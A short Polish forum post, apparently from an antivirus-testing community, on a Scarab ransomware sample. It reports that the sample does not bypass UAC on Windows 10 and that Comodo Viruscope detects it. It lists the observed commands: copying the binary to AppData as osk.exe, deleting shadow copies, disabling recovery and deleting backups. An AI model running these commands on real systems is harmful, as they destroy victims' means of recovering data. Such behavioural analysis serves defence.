Ransomware_Scarab
W Windows 10 64 UAC nie omija.
Viruscope Comodo wykrywa działania.
Treść widoczna jedynie dla zarejestrowanych użytkowników
W Windows 10 64 UAC nie omija.
Kod:
copy /y "C:\Users\tach\Downloads\99bf287732f8e6ee6f9dce937598e1ddb5343c51fd538d1fe9f28cd0b3f82583.bin\Ransomware_Scarab.exe" "C:\Users\tach\AppData\Roaming\osk.exe
vssadmin Delete Shadows /All /Quiet
wmic SHADOWCOPY DELETE
bcdedit /set {default} recoveryenabled No
wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
Viruscope Comodo wykrywa działania.